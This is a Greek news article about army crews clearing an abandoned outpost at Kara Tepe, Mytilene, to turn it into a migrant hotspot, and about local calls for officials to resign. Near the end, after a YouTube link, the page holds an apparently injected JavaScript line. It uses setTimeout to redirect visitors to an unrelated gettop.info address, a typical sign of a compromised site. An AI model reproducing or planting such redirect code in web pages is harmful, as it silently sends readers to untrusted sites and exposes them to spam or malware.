Ετοιμάζουν νέο hot spot στη Μυτιλήνη (BINTEO)

0
12

 

Σε εξέλιξη είναι εργασίες σε εγκαταλελειμμένο στρατόπεδο της Μυτιλήνης προκειμένου να δημιουργηθεί νέος χώρος φιλοξενίας προσφύγων και μεταναστών παρά τις περί αντιθέτου δεσμεύσεις της κυβέρνησης για αποσυμφόρηση των ελληνικών νησιών.

Όπως γράφει το LesvosNews.gr, το εγκαταλελειμμένο εδώ και αρκετό χρονικό διάστημα φυλάκιο – στρατόπεδο της Λεμονούς στον Καρά Τεπέ είναι ο χώρος ο οποίος θα διαμορφωθεί σε Hotspot για να φιλοξενήσει μετανάστες.

Το LesvosNews.gr πήγε επί τόπου στο χώρο αυτό και διαπίστωσε ότι όντως συνεργεία του Ελληνικού Στρατού εργάζονται πυρετωδώς, ώστε να καθαρίσουν το φυλάκιο και στη συνέχεια να το παραδώσουν στη διαχείριση του Υπουργείου Μεταναστευτικής Πολιτικής, κάτι που δεν είναι γνωστό αν γνωρίζουν ή ποια είναι η συμμετοχή σ’ αυτήν την απόφαση της Περιφερειάρχη Βορείου Αιγαίου Χριστιάνας Καλογήρου αλλά και του δημάρχου Λέσβου Σπύρου Γαληνού.

Το ενημερωτικό portal της Λέσβου προτείνει να παραιτηθούν τόσο η κ. Καλογήρου όσο και ο κ. Γαληνός, διότι δεν δικαιολογείται κανείς να συμβαίνουν τέτοια πράγματα στην περιοχή του και να έχει άγρια μεσάνυχτα.

Εάν πάλι γνωρίζουν το θέμα, θα πρέπει να αποκαλύψουν αν συναίνεσαν στη δημιουργία του νέου αυτού κέντρου φιλοξενίας μεταναστών, ή αν εξέφρασαν την αντίθεσή τους.

https://youtu.be/qsdOtkd-Ids setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here